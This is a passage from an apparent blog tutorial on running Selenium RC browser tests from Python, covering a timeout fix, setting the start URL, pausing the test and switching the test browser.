"/home/james/Desktop/GRP/code/trunk/GRP/test/selenium.py", line 215, in do_command raise Exception, data Exception: Timed out after 30000ms ---------------------------------------------------------------------- Ran 1 test in 44.308s FAILED (errors=1) This is because you need to specify the URL where Selenium should start its testing. Ordinarily Selenium can't test across multiple domains so the domain you start at is the only one which can be testes. Selenium is able to work around this limitation in certain browsers such as Firefox and IE as you can read about at Since we are using Firefox Selenium RC can test multiple domains at once but it still needs to be given the URL to start at. Since the test you performed in the Selenium IDE section started at you should change the URL to in the code. If you run the test again you should see Selenium repeat all the actions and this time confirm the output was a success: . ---------------------------------------------------------------------- Ran 1 test in 37.098s OK If you want to examine the windows which pop-up during the tests, just add these lines to the end of the test_new() method to make the test wait for 10 seconds after it has been run: import time time.sleep(10) You can now remote control the browser from Python which means you can perform other tasks in-between the tests you are running. For example, you might want to remove all data from your test database before the tests are run. To test your code in a different browser you would change this line: self.selenium = selenium("localhost", 4444, "*chrome", "") To something like this: self.selenium = selenium( "localhost", 4444, "c:\\program files\\internet explorer\\iexplore.exe", "" ) Happy testing. - Selenium Website: - - Python Documentation: -
https://www.jimmyg.org/blog/2009/getting-started-with-selenium-and-python.html
CC-MAIN-2020-24
refinedweb
1,014
56.76
It is used to get/set stream buffer. If sb is a null pointer, the function automatically sets the badbit error state flags (which may throw an exception if member exceptions has been passed badbit). Some derived stream classes (such as stringstream and fstream) maintain their own internal stream buffer, to which they are associated on construction. Calling this function to change the associated stream buffer shall have no effect on that internal stream buffer: the stream will have an associated stream buffer which is different from its internal stream buffer (although input/output operations on streams always use the associated stream buffer, as returned by this member function). Following is the declaration for ios::rdbuf function. get (1) streambuf* rdbuf() const; set (2) streambuf* rdbuf (streambuf* sb); The first form (1) returns a pointer to the stream buffer object currently associated with the stream. The second form (2) also sets the object pointed by sb as the stream buffer associated with the stream and clears the error state flags. sb − Pointer to a streambuf object. A pointer to the stream buffer object associated with the stream before the call. Basic guarantee − if an exception is thrown, the stream is in a valid state. It throws an exception of member type failure if sb is a null pointer and member exceptions was set to throw for badbit. Accesses (1) or modifies (2) the stream object. Concurrent access to the same stream object may cause data races. In below example explains about ios::rdbuf function. #include <iostream> #include <fstream> int main () { std::streambuf *psbuf, *backup; std::ofstream filestr; filestr.open ("test.txt"); backup = std::cout.rdbuf(); psbuf = filestr.rdbuf(); std::cout.rdbuf(psbuf); std::cout << "This is written to the file"; std::cout.rdbuf(backup); filestr.close(); return 0; }
https://www.tutorialspoint.com/cpp_standard_library/cpp_ios_rdbuf.htm
CC-MAIN-2020-16
refinedweb
298
56.55
You can subscribe to this list here. Showing 2 results of 2 Hi, Am Hi Michael, sorry for being late in the discussion. Am 10.05.2012 um 10:28 schrieb Michael J Gruber: > r3151 took into account the direction already but missed the fact that > arrows are positioned wrt. the constriction center now. Make it so that > a reversed arrow is positioned wrt. the constriction center also. To my understanding this is not true. Everything is completely symmetric. For earrows, at pos=0, the "back" of the arrow starts at the starting point of the path and at pos=1 (the default for earrow) the tip is at the end. The same for barrow. At pos=1 the back is at the end of the path and at pos=0 (the default for barrow) the tip is at the beginning. Those limits are correct. In between we're just going linearly. I'm sorry, your circular example is much to complicated for me. Here's my attempt: from pyx import * ···· c = canvas.canvas() c.stroke(path.line(0, 0, 10, 0)) c.stroke(path.line(0, 0, 0, 2)) c.stroke(path.line(0.1, 0, 0.1, 2)) c.stroke(path.line(5, 0, 5, 2)) c.stroke(path.line(9.9, 0, 9.9, 2)) c.stroke(path.line(10, 0, 10, 2)) c.stroke(path.line(0, 0.2, 10, 0.2), [deco.arrow(pos=1)]) # earrow c.stroke(path.line(0, 0.4, 10, 0.4), [deco.arrow(pos=1, reversed=1)]) c.stroke(path.line(0, 0.6, 10, 0.6), [deco.arrow(pos=0.99)]) c.stroke(path.line(0, 0.8, 10, 0.8), [deco.arrow(pos=0.99, reversed=1)]) c.stroke(path.line(0, 1.0, 10, 1.0), [deco.arrow(pos=0.5)]) c.stroke(path.line(0, 1.2, 10, 1.2), [deco.arrow(pos=0.5, reversed=1)]) c.stroke(path.line(0, 1.4, 10, 1.4), [deco.arrow(pos=0.01)]) c.stroke(path.line(0, 1.6, 10, 1.6), [deco.arrow(pos=0.01, reversed=1)]) c.stroke(path.line(0, 1.8, 10, 1.8), [deco.arrow(pos=0)]) c.stroke(path.line(0, 2.0, 10, 2.0), [deco.arrow(pos=0, reversed=1)]) # barrow c.writePDFfile() Now try your patches. It creates a lot of confusion. No way. I think the positioning of the arrows on the circle you're trying to get right should be done using path features. This is trivial: from pyx import * c = canvas.canvas() circ = path.circle(0, 0, 5) p = path.line(0, 0, 5, 5) c.stroke(circ.split(circ.intersect(p)[0][0])[0], [deco.arrow(size=1)]) c.stroke(p) c.writePDFfile() Now, the only problem is if you want to position the "back of the arrow" at the intersection point. I don't know whether it is that useful (technically) but I fully understand that it might be desirable from a visual point of view sometimes. You need to take into account the constriction length of the arrow in question. Unfortunately this was not accessible from the outside. I just checked in a simple patch (changeset 3247). Then it becomes a simple modification of what we had before: from pyx import * c = canvas.canvas() circ = path.circle(0, 0, 5) p = path.line(0, 0, 5, 5) a = deco.arrow(size=1) c.stroke(circ.split(circ.intersect(p)[0][0] + a.constrictionlen)[0], [a]) c.stroke(p) c.writePDFfile() Best, André -- by _ _ _ Dr. André Wobst, Amselweg 22, 85716 Unterschleißheim / \ \ / ) wobsta@..., / _ \ \/\/ / PyX - High quality PostScript and PDF figures (_/ \_)_/\_/ with Python & TeX: visit
http://sourceforge.net/p/pyx/mailman/pyx-devel/?viewmonth=201205&viewday=21
CC-MAIN-2014-23
refinedweb
620
72.42
We are about to switch to a new forum software. Until then we have removed the registration on this forum. Hello,i have this code import saito.objloader.*; OBJModel model ; OBJModel tmpmodel ; PVector[] PVArray; float rotX, rotY; float k = 0.0; void setup() { size(800, 600, P3D); frameRate(30); model = new OBJModel(this, "Model2.obj", "absolute", TRIANGLES); model.enableDebug(); model.scale(100); model.translateToCenter(); tmpmodel = new OBJModel(this, "Model2.obj", "absolute", TRIANGLES); tmpmodel.enableDebug(); tmpmodel.scale(100); tmpmodel.translateToCenter(); frameRate(100); stroke(255); noStroke(); } void draw() { background(129); lights(); translate(width/2, height/2, 0); //rotX+=0.1; rotY+=0.01; //rotateX(rotX); //rotateY(rotY); pushMatrix(); for (int i = 0; i < model.getVertexCount (); i++) { PVector orgv = model.getVertex(i); PVector tmpv = new PVector(); PVArray[i] = new PVector(); //tmpv.x = mouseY; //tmpv.y = mouseY; println(orgv); tmpv.x = orgv.x *(i*mouseX); tmpv.y = orgv.y+ (i*0.01) ; tmpv.z = orgv.z; tmpmodel.setVertex(i, tmpv); } k+=0.01; popMatrix(); tmpmodel.draw(); } I have problem with the model.getVertex(i) function,I want to make an array of the PVectors that it gets,so i can manipulate them individualy,with custom functions.and no as a whole object.Do you have any idea?Or u think its better to use PShapeObj? Thanks in advance Answers hello again,i made the sketch with arraylist,but it keeps storing the varible i as one element of the arraylist that pass all the vertices.Any Help please. Cross-posted: Seems similar to the for ( ; ; )loop logical problem from: yeah i know,i did it because sometimes here noone answers i will check it i did this and worked perfect until now,no null pointer exception pushMatrix(); hello again,i did this.The array works,but when i printArray(Verts) it returns null,when i println(model.getVertex(i)),i get the Pvectors. if i declare the array as global variable and then populate it in the for loop like this Verts[i]= model.getVertex(i); i get null pointer exception vertCount is 12738 hello,again i proceed the sketch to this.Is any way to irritate through the array of PVectors and make them have autonomous movement,because now it moves only the whole object.I want to make the vertices act like particles.
https://forum.processing.org/two/discussion/comment/73738/
CC-MAIN-2021-10
refinedweb
381
53.17
hi, i was implementing strstr() to see how it works. Code:#include<iostream> using namespace std; int main() { char str[] = "this is a test"; char*s; s=strstr(str,"test"); cout<<s<<endl; } i have two question . question 1 > what is the full form of strstr() ? for example, if i write strcpy ---> it means string copy. similarly what is the meaning of strstr() ? the syntaxex dont give the full form of this function. can you tell what is the literal meaning? question 2. without assigning a memory (by new keyword ) the code is running!! look, i have simply tested with only char *s; but no memory allocated.
https://cboard.cprogramming.com/c-programming/51771-strstr-question.html
CC-MAIN-2018-05
refinedweb
107
77.23
SQL Server "Yukon" and the CLR: Using Server Data plumbing.. Using the SqlContext Object When you install SQL Server "Yukon", it includes an assembly with the System.Data.SqlServer namespace. This is the in-process managed provider: a new ADO.NET provider whose task it is to communicate back from the CLR to SQL Server. But it doesn't communicate with just any SQL Server (there's already System.Data.SqlClient for that). Instead, when you load CLR code into Yukon (by declaring it as an assembly), the in-process managed provider lets you connect directly to the server that's hosting your code. You can use this to retrieve data from the server or to send data to the server. Here's a simple first example, in the form of a user-defined function that uses data from the server instance that calls it: Imports System.Data.SqlServer Imports System.Data.Sql Namespace NorthwindExtras Public Class Products <SqlFunction(DataAccess:=DataAccessKind.Read)> _ Public Shared Function InventoryValue( _ ByVal ProductID As Integer) As Double ' Create a SqlCommand object pointing at the parent database Dim cmd As SqlCommand = SqlContext.GetCommand() cmd.CommandType = CommandType.Text cmd.CommandText = "SELECT UnitsInStock * UnitPrice " & _ "FROM Products WHERE ProductID = " & CStr(ProductID) ' Execute the command and return the result InventoryValue = CDbl(cmd.ExecuteScalar()) End Function End Class End Namespace If you've used ADO.NET to work with SQL Server in the past, this code should look very familiar to you. The key difference is that this code doesn't use a SqlConnection object. Instead, it starts its work with the SqlContext object, which you can think of as a SqlConnection that points directly back to the calling database. In this case, I've used the SqlContext object to give me a SqlCommand, and then executed a SELECT statement in that command. The results are used as the value of the function. After compiling the assembly, I can use it within SQL Server "Yukon" like this (refer to the first article in the series for more details): CREATE ASSEMBLY NorthwindExtras FROM 'C:\NorthwindExtras\bin\NorthwindExtras.dll' GO CREATE FUNCTION InventoryValue(@ProductID INT) RETURNS FLOAT EXTERNAL NAME NorthwindExtras:[NorthwindExtras.Products]::InventoryValue GO SELECT dbo.InventoryValue(1) GO ---------------------- 702 (1 row(s) affected) Note that these statements need to be run in the Northwind sample database to work, because the VB .NET code is expecting to find one of the Northwind tables when it calls back through the SqlContext object. Using the SqlPipe Object A second important object is the SqlPipe object. This is the key to sending data back to SQL Sever "Yukon" from your CLR code. You can think of the SqlPipe object as something like the ASP.NET Response object; anything you drop into the SqlPipe comes out the other end in the calling T-SQL code. For example, to write a stored procedure in the CLR, you use a SqlPipe object to transmit the results back to the server. I'll add a second member to the Products class to demonstrate how this works, with a few extras thrown in for good measure: <SqlMethod()> _ Public Shared Sub GetProspects(ByVal State As String) ' Set up a pipeline for the stored procedure results Dim sp As SqlPipe = SqlContext.GetPipe() ' Connect to a different SQL Server database Dim cnn As System.Data.SqlClient.SqlConnection = _ New System.Data.SqlClient.SqlConnection cnn.ConnectionString = _ "Data Source=(local);Initial Catalog=pubs;Integrated Security=SSPI" cnn.Open() ' Retrieve some data Dim cmd As System.Data.SqlClient.SqlCommand = cnn.CreateCommand() cmd.CommandText = "SELECT au_fname + ' ' + au_lname AS Prospect " & _ "FROM authors WHERE state = '" & State & "'" Dim dr As System.Data.SqlClient.SqlDataReader = cmd.ExecuteReader() ' And return the results sp.Send(dr) cnn.Close() End Sub This code introduces a few new things. First, there's the SqlMethod attribute, which tells Yukon to treat this member as a stored procedure (assuming that it's properly registered on the database side of things). The SqlPipe object comes directly from the SqlContext object, giving the code a pipeline back to the calling database. But in this particular case, I'm also opening a connection to another database. Note that I'm using objects in the System.Data.SqlClient namespace for this, and that I have to use their fully-qualified names so that the compiler knows I'm using the standard SQL Server provider rather than the in-process provider. At the end of the procedure, I call the Send method of the SqlPipe object to send the results back to the calling T-SQL code. The send method has several overloads; it can accept a string, a SqlError object, or an object that implements ISqlReader or ISqlRecord. In this case, the standard SqlDataReader class implements ISqlReader. Registering and using this stored procedure looks like this: CREATE ASSEMBLY NorthwindExtras FROM 'C:\NorthwindExtras\bin\NorthwindExtras.dll' WITH PERMISSION_SET = EXTERNAL_ACCESS GO CREATE PROCEDURE GetProspects (@State nvarchar(2)) AS EXTERNAL NAME NorthwindExtras:[NorthwindExtras.Products]::GetProspects GO GetProspects 'CA' GO varchar ------------------------------------------------------------- Johnson White Marjorie Green Cheryl Carson Michael O'Leary Dean Straight Abraham Bennet Ann Dull Burt Gringlesby Charlene Locksley Akiko Yokomoto Dirk Stringer Stearns MacFeather Livia Karsen Sheryl Hunter Heather McBadden (15 row(s) affected) You'll see that I've added an extra clause to the CREATE ASSEMBLY statement here. By default, an assembly registered with SQL Server "Yukon" doesn't have permission to use resources outside of the local database instance. This will block any use of the System.Data.SqlClient namespace (among many other operations). By using WITH PERMISSION_SET = EXTERNAL_ACCESS, I'm telling SQL Server "Yukon" that I want to allow the assembly to access external resources. There's also another version, WITH PERMISSION_SET = UNSAFE, for running code that can't be verified; you should reserve this for very exceptional circumstances because it could represent a large security hole. The CREATE PROCEDURE statement is very similar to CREATE FUNCTION. After creating the procedure, I can just run it, like any other stored procedure. Looking Forward As always with new code, there's the question of where you might actually want to use this stuff. I've already discussed some of the reasons you might want to move procedures to managed code: speed and complexity, for example, or access to resources outside of SQL Server. What catches my eye in these examples is the SqlPipe object, and its ability to return anything that implements IDataReader. Implementing an interface is pretty simple in .NET (and it will get even easier in Visual Studio .NET "Whidbey"), so this gives us the ability to return just about any data as the results of a SQL Server stored procedure. Imagine a result set of Registry keys, or Active Directory objects, or IIS log file records, or...well...just about anything that you could represent in rows and columns. I don't think anyone knows exactly what CLR code will be used for in production deployments of SQL Server "Yukon," but with the flexibility and power of this connection I'm sure the results will be interesting indeed.<<
http://www.developer.com/db/article.php/3289101
CC-MAIN-2016-36
refinedweb
1,176
54.52
Errors can be broadly categorized into two types. We will discuss them one by one. Compile Time Errors – Errors caught during compiled time is called Compile time errors. Compile time errors include library reference, syntax error or incorrect class import. Run Time Errors - They are also known as exceptions. An exception caught during run time creates serious issues. Errors hinder normal execution of program. Exception handling is the process of handling errors and exceptions in such a way that they do not hinder normal execution of the system. For example, User divides a number by zero, this will compile successfully but an exception or run time error will occur due to which our applications will be crashed. In order to avoid this we'll introduce exception handling technics in our code. In C++, Error handling is done using three keywords: Syntax: try { //code throw parameter; } catch(exceptionname ex) { //code to handle exception } tryblock The code which can throw any exception is kept inside(or enclosed in) a try block. Then, when the code will lead to any error, that error/exception will get caught inside the catch block. catchblock catch block is intended to catch the error and handle the exception condition. We can have multiple catch blocks to handle different types of exception and perform different actions when the exceptions occur. For example, we can display descriptive messages to explain why any particular excpetion occured. throwstatement It is used to throw exceptions to exception handler i.e. it is used to communicate information about error. A throw expression accepts one parameter and that parameter is passed to handler. throw statement is used when we explicitly want an exception to occur, then we can use throw statement to throw or generate that exception. Let's take a simple example to understand the usage of try, catch and throw. Below program compiles successfully but the program fails at runtime, leading to an exception. #include <iostream>#include<conio.h> using namespace std; int main() { int a=10,b=0,c; c=a/b; return 0; } The above program will not run, and will show runtime error on screen, because we are trying to divide a number with 0, which is not possible. How to handle this situation? We can handle such situations using exception handling and can inform the user that you cannot divide a number by zero, by displaying a message. try, catchand throwStatement Now we will update the above program and include exception handling in it. #include <iostream> #include<conio.h> using namespace std; int main() { int a=10, b=0, c; // try block activates exception handling try { if(b == 0) { // throw custom exception throw "Division by zero not possible"; c = a/b; } } catch(char* ex) // catches exception { cout<<ex; } return 0; } Division by zero not possible In the code above, we are checking the divisor, if it is zero, we are throwing an exception message, then the catch block catches that exception and prints the message. Doing so, the user will never know that our program failed at runtime, he/she will only see the message "Division by zero not possible". This is gracefully handling the exception condition which is why exception handling is used. catchblocks Below program contains multiple catch blocks to handle different types of exception in different way. #include <iostream> #include<conio.h> using namespace std; int main() { int x[3] = {-1,2}; for(int i=0; i<2; i++) { int ex = x[i]; try { if (ex > 0) // throwing numeric value as exception throw ex; else // throwing a character as exception throw 'ex'; } catch (int ex) // to catch numeric exceptions { cout << "Integer exception\n"; } catch (char ex) // to catch character/string exceptions { cout << "Character exception\n"; } } } Integer exception Character exception The above program is self-explanatory, if the value of integer in the array x is less than 0, we are throwing a numeric value as exception and if the value is greater than 0, then we are throwing a character value as exception. And we have two different catch blocks to catch those exceptions. catchblock in C++ Below program contains a generalized catch block to catch any uncaught errors/exceptions. catch(...) block takes care of all type of exceptions. #include <iostream> #include<conio.h> using namespace std; int main() { int x[3] = {-1,2}; for(int i=0; i<2; i++) { int ex=x[i]; try { if (ex > 0) throw ex; else throw 'ex'; } // generalised catch block catch (...) { cout << "Special exception\n"; } } return 0; } Special exception Special exception In the case above, both the exceptions are being catched by a single catch block. We can even have separate catch blocks to handle integer and character exception along with th generalised catch block. There are some standard exceptions in C++ under <exception> which we can use in our programs. They are arranged in a parent-child class hierarchy which is depicted below:
https://www.studytonight.com/cpp/exception-handling-in-cpp.php
CC-MAIN-2020-05
refinedweb
816
52.49
« Return to documentation listing MPI_Wait - Waits for an MPI send or receive to complete. #include <mpi.h> int MPI_Wait(MPI_Request *request, MPI_Status *status) INCLUDE 'mpif.h' MPI_WAIT(REQUEST, STATUS, IERROR) INTEGER REQUEST, STATUS(MPI_STATUS_SIZE), IERROR #include <mpi.h> void Request::Wait(Status& status) void Request::Wait() request Request (handle). status Status object (status). IERROR Fortran only: Error status (integer). A call to MPI_Wait returns when the operation identified by request is complete. If the communication object associated with this request was created by a nonblocking send or receive call, then the object is deal- located by the call to MPI_Wait and the request handle is set to MPI_REQUEST_NULL. The call returns, in status, information on the completed operation. The content of the status object for a receive operation can be accessed as described in Section 3.2.5 of the MPI-1 Standard, "Return Status." The status object for a send operation may be queried_Wait with a null or inactive request argu- ment. In this case the operation returns immediately with empty status. Successful return of MPI_Wait after an MPI_Ibsend implies that the user send buffer can be reused i.e., data has been sent out or copied into. MPI_Comm_set_errhandler MPI_File_set_errhandler MPI_Test MPI_Testall MPI_Testany MPI_Testsome MPI_Waitall MPI_Waitany MPI_Waitsome MPI_Win_set_errhandler Open MPI 1.2 March 2007 MPI_Wait(3OpenMPI)
https://www-lb.open-mpi.org/doc/v1.2/man3/MPI_Wait.3.php
CC-MAIN-2022-40
refinedweb
217
50.94
The template engine Play has an efficient templating system which allows to dynamically generate HTML, XML, JSON or any text-based formatted document. The template engine uses Groovy as an expression language. A tag system allows you to create reusable functions. Templates are stored in the app/views directory. Template syntax A template file is a text file, some parts of which have placeholders for dynamically generated content. The template’s dynamic elements are written using the Groovy language. Groovy’s syntax is very close to Java’s. Dynamic elements are resolved during template execution. The rendered result is then sent as part of the HTTP response. Expressions: ${…} The simplest way to make a dynamic element is to declare an expression. The syntax used here is ${…}. The result of evaluating the expression is inserted in place of the expression. For example: <h1>Client ${client.name}</h1> If you can’t be sure of client being null, there is a Groovy shortcut: <h1>Client ${client?.name}</h1> Which will only display the client name if the client is not null. Template decorators : #{extends /} and #{doLayout /} Decorators provide a clean solution to share a page layout (or design) across several templates. Use #{get} and #{set} tags to share variables between the template and the decorator. Embedding a page in a decorator is the matter of a one liner: #{extends 'simpledesign.html' /} #{set title:'A decorated page' /} This content will be decorated. The decorator : simpledesign.html <html xmlns="" xml: <head> <title>#{get 'title' /}</title> <link rel="stylesheet" type="text/css" href="@{'/public/stylesheets/main.css'}" /> </head> <body> <h1>#{get 'title' /}</h1> #{doLayout /} <div class="footer">Built with the play! framework</div> </body> </html> Tags: #{tagName /} A tag is a template fragment that can be called with parameters. If the tag has only one parameter, by convention it is called “arg” and its name can be omitted. For example, this tag inserts a SCRIPT tag to load a JavaScript file: #{script 'jquery.js' /} A tag has to be closed, either directly or by an end tag: #{script 'jquery.js' /} or #{script 'jquery.js'}#{/script} For example the list tag allows iteration over any collection. It takes two mandatory parameters: <h1>Client ${client.name}</h1> <ul> #{list items:client.accounts, as:'account' } <li>${account}</li> #{/list} </ul>} Actions: @{…} or @@{…} You can use the Router to (reverse) generate a URL corresponding to a specified route. From a template you can use the special @{…} syntax to do that. For example: <h1>Client ${client.name}</h1> <p> <a href="@{Clients.showAccounts(client.id)}">All accounts</a> </p> <hr /> <a href="@{Clients.index()}">Back</a> The @@{…} syntax does the same but generates an absolute URL (notably useful for e-mail). Messages: &{…} If your application needs internationalization you can use the &{…} syntax to display an internationalized message: For example in the files conf/messages we specify: clientName=The client name is %s To display this message in a template, simply use: <h1>&{'clientName', client.name}</h1> Comment: *{…}* Comments aren’t evaluated by the template engine. They are just comments… *{**** Display the user name ****}* <div class="name"> ${user.name} </div> Scripts: %{…}% A script is a more complicated set of expressions. A script can declare some variables and define some statements. Use the %{…}% syntax to insert a script. %{ fullName = client.name.toUpperCase()+' '+client.forname; }% <h1>Client ${fullName}</h1> A script can write dynamic content directly using the out object: %{ fullName = client.name.toUpperCase()+' '+client.forname; out.print('<h1>'+fullName+'</h1>'); }% You can use a script to create a structure such as an iteration in your template: <h1>Client ${client.name}</h1> <ul> %{ for(account in client.accounts) { }% <li>${account}</li> %{ } }% </ul> Bear in mind that a template is not a place to do complex things. So, use a tag when you can, or move the computations into the controller or the model object. Template inheritance A template can inherit another template, i.e. it can be included as a part of an other template. To inherit another template, use the extends tag: #{extends 'main.html' /} <h1>Some code</h1> The main.html template is a standard template, but it uses the doLayout tag to include the content: <h1>Main template</h1> <div id="content"> #{doLayout /} </div> Custom template tags You can easily create specific tags for your application. A tag is a simple template file, stored in the app/views/tags directory. The template’s file name is used as the tag name. To create a hello tag, just create the app/views/tags/hello.html file. Hello from tag! No need to configure anything. You can use the tag directly: #{hello /} Retrieve tag parameters Tag parameters are exposed as template variables. The variable names are constructed with the ‘_’ character prepended to the parameter name. For example: Hello ${_name} ! And you can pass the name parameter to the tag: #{hello name:'Bob' /} If your tag has only one parameter, you can use the fact than the default parameter name is arg and that its name is implicit. Example: Hello ${_arg}! And you can call it easily using: #{hello 'Bob' /} Invoke tag body If your tag supports a body, you can include it at any point in the tag code, using the doBody tag. For example: Hello #{doBody /}! And you can then pass the name as tag body: #{hello} Bob #{/hello} Format-specific tags You can have different versions of a tag for different content types and Play will select the appropriate tag. For example, Play will use the app/views/tags/hello.html tag when request.format is html, and app/views/tags/hello.xml when the format is xml. Whatever the content type, Play will fall back to the .tag extension if a format-specific tag is not available, e.g. app/views/tags/hello.tag. Custom Java tags You can also define custom tags in Java code. Similarly to how JavaExtensions work by extending the play.templates.JavaExtensions class, to create a FastTag you need to create a method in a class that extends play.templates.FastTags. Each method that you want to execute as a tag must have the following method signature. public static void _tagName(Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine) Note the underscore before the tag name. To understand how to build an actual tag, let’s look at two of the built-in tags. For example, the verbatim tag is implemented by a one-line method that simply calls the toString method on the JavaExtensions, and passes in the body of the tag. public static void _verbatim(Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine) { out.println(JavaExtensions.toString(body)); } The body of the tag would be anything between the open and close tag. So <verbatim>My verbatim</verbatim> The body value would be My verbatim The second example is the option tag, which is slightly more complex because it relies on a parent tag to function. public static void _option(Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine) { Object value = args.get("arg"); Object selection = TagContext.parent("select").data.get("selected"); boolean selected = selection != null && value != null && selection.equals(value); out.print("<option value=\"" + (value == null ? "" : value) + "\" " + (selected ? "selected=\"selected\"" : "") + "" + serialize(args, "selected", "value") + ">"); out.println(JavaExtensions.toString(body)); out.print("</option>"); } This code works by outputting an HTML option tag, and sets the selected value by checking which value is selected from the parent tag. The first three lines set variables for use in the output output. Then, the final three lines output the result of the tag. There are many more examples in the source code for the built in tags, with varying degrees of complexity. See FastTags.java in github. Tag namespaces To ensure that your tags do not conflict between projects, or with the core Play tags, you can set up namespaces, using the class level annotation @FastTags.Namespace. So, for a hello tag, in a my.tags namespace, you would do the following @FastTags.Namespace("my.tags") public class MyFastTag extends FastTags { public static void _hello (Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine) { ... } } and then in your templates, you would reference the hello tag as #{my.tags.hello/} Java object extensions in templates When you use your Java object within the template engine, new methods are added to it. These methods don’t exist in the original Java class and are dynamically added by the template engine. For example, to allow easy number formatting in a template, a format method is added to java.lang.Number. It’s then very easy to format a number: <ul> #{list items:products, as:'product'} <li>${product.name}. Price: ${product.price.format('## ###,00')} €</li> #{/list} </ul> The same applies to java.util.Date. The Java extensions manual page lists the available methods, by type. Create custom extensions Your project may have specific formatting needs, in which case you can provide your own extensions. You only need to create a Java class extending play.templates.JavaExtensions. For instance, to provide a custom currency formatter for a number: package ext; import play.templates.JavaExtensions; public class CurrencyExtensions extends JavaExtensions { public static String ccyAmount(Number number, String currencySymbol) { String format = "'"+currencySymbol + "'#####.##"; return new DecimalFormat(format).format(number); } } Each extension method is a static method and should return a java.lang.String to be written back in the page. The first parameter will hold the enhanced object. Use your formatter like this: <em>Price: ${123456.324234.ccyAmount()}</em> Template extension classes are automatically detected by Play at start-up. You just have to restart your application to make them available. Implicit objects available in a template All objects added to the renderArgs scope are directly injected as template variables. For instance, to inject a ‘user’ bean into the template from a controller: renderArgs.put("user", user ); When you render a template from an action, the framework also adds implicit objects: In addition to the list above the names owner, delegate and it are reserved in Groovy and shouldn’t be used as variable names in templates. Next: Form data validation
https://www.playframework.com/documentation/1.2.4/templates
CC-MAIN-2015-11
refinedweb
1,684
58.89
On Tue, Jun 16, 2015 at 03:45:34AM +0900, kikuc...@uranus.dti.ne.jp wrote: > On Mon, 15 Jun 2015 12:49:16 +0200, Mateusz Guzik <mjgu...@gmail.com> wrote: > > Fundamentally the basic question is how does the implementation cope > > with processes having sysvshm mappings obtained from 2 different jails > > (provided they use different sysvshms). > > > > Preferably the whole business would be /prevented/. Prevention mechanism > > would have to deal with shared address spaces (rfork(2) + RFMEM), > > threads and pre-existing mappings. > > > > The patch posted here just puts permission checks in several places, > > while leaving the namespace shared, which I find to be a user-visible > > hack with no good justification. There is also no analysis how this > > behaves when presented with aforementioned scenario. Even if it turns > > out the resut is harmless with resulting code, this leaves us with a > > very error-prone scheme. > > > > There is no technical problem adding a pointer to struct prison and > > dereferencing it instead of current global vars. Adding proper sysctls > > dumping the content for given jail is trivial and so is providing > > resource limits when creating a first-level jail with a separate > > sysvshm. Something which cannot be as easily achieved with the patch in > > question. > > Could you try the latest patch, please? > I justify user-visibility, make it hierarchical jail friendly, and use EINVAL > instead of EACCES to conceal information leak. > (typo fixed) > > > I realized my method is a bit better, when I'm trying to port/write the real > namespace separation. > Let me explain (again) why I choose this method for sysv ipc, and could you > tell me how it should be, please? > > struct shmmap_state { > vm_offset_t va; > int shmid; > }; > > In sysv_shm.c, struct shmmap_state, exist per process as > p->p_vmspace->vm_shm, is a lookup-table for va -> shm object lookup. > The shmmap_state entry holds a reference (here, shmid) to shm object for > further detach, and entries are simply copied on fork. > > If you split namespace (includes shmid space) completely, shmid would be no > longer a unique identifier for IPC object in kernel. > To make it unique, adding a reference to prison into shmmap_state like this; > > struct shmmap_state { > vm_offset_t va; > struct prison *prison; > int shmid; > }; > > would be bad idea, because after a process calls jail_attach(), the process > holds a reference to another (creator) prison, or copy the IPC object > completely on every jail_attach() occurs? As I explained in the previous thread, with a separate namespace it is a strict requirement to prevent sharing of sysvshm mappings. With the requirement met, there is no issue. As you will see later in the mail, even your approach would benefit greatly from having such a restriction. > How do you deal with hierarchical jail? > If proper resource limiting for hierarchical jails is implemented, the new jail either inherits or gets a new namespace, depending on used options. With only simplistic support first level jails can inherit or get a new namespace, the rest must inherit. There is no issue here due to sharing prevention. > My method didn't touch anything about the mapping stuff, thus it behaves > exactly the same as current FreeBSD behave on this point. > Sure it did. As you noticed yourself it makes sense to clean up sysvshms on jail destruction, which you do in sysvshm_cleanup_for_prison_myhook. Your code does: if ((shmseg->u.shm_perm.mode & SHMSEG_ALLOCATED) && shmseg->cred->cr_prison == pr) { shm_remove(shmseg, i); .... which differs from what is executed by kern_shmdt_locked. Now let's consider a process which rforks and shared the address space with it's child. The child enters a jail and grabs a sysvshm mapping, then exits and we kill the jail. In effect we got a process with an address space which used a mapping created in a now-destroyed jail. Is this situation problematic? I don't see any anlysis provided. Maybe it is, maybe it so happens it is not. The mere posibility of this scenario needlessly complicates maintenance, and such a scenario has likely no practical purpose. As such, it is best /prevented/. With it prevented there is nothing positive about your approach that I could see. > I'm not sure I could understand properly what the shared address space > problem is, (Could someone help me to understand, perhaps in code?) > and, I'm not sure whether the current FreeBSD has the shared address space > problem for sysvshm combined with jails. > If it has the problem, unfortunately my patch doesn't provide any solution > for that, > but if not, my patch doesn't have the problem either, because I didn't change > code structure. > As I mentioned, you sure did. I don't know if there are any serious problems /as it is/ and I'm too lazy to check. I surely expect any patch doing sysvshm for jails to be provided with an anslysis of its behaviour in that regard though. > The patch just fixes key_t collision for jails, nothing more. > So, the patch is harmless for non-jail user, and I believe it's useful for > jail user using allow.sysvipc=true. > > > BTW, What do you think about the following design for jail-aware sysvipc? > > > - IPC objects created on parent jail, are invisible to children. > > - IPC objects created on neighbor jail, are also invisible each other. > > - IPC objects craeted on child jail, are VISIBLE from parent. > > - IPC key_t spaces are separated between jails. If you see the key_t named > > object from parent, it's shown as IPC_PRIVATE. > How about the following: the jail decided whether it wants to share a namespace with a particular child (and by extension grandchildren and so on). Done. There is nothing complicated to do here unless you want to try out named namespace which you e.g. assign to different jails on the same level. -- Mateusz Guzik <mjguzik gmail.com> _______________________________________________ freebsd-virtualization@freebsd.org mailing list To unsubscribe, send any mail to "freebsd-virtualization-unsubscr...@freebsd.org"
https://www.mail-archive.com/freebsd-virtualization@freebsd.org/msg03384.html
CC-MAIN-2018-13
refinedweb
977
64.81
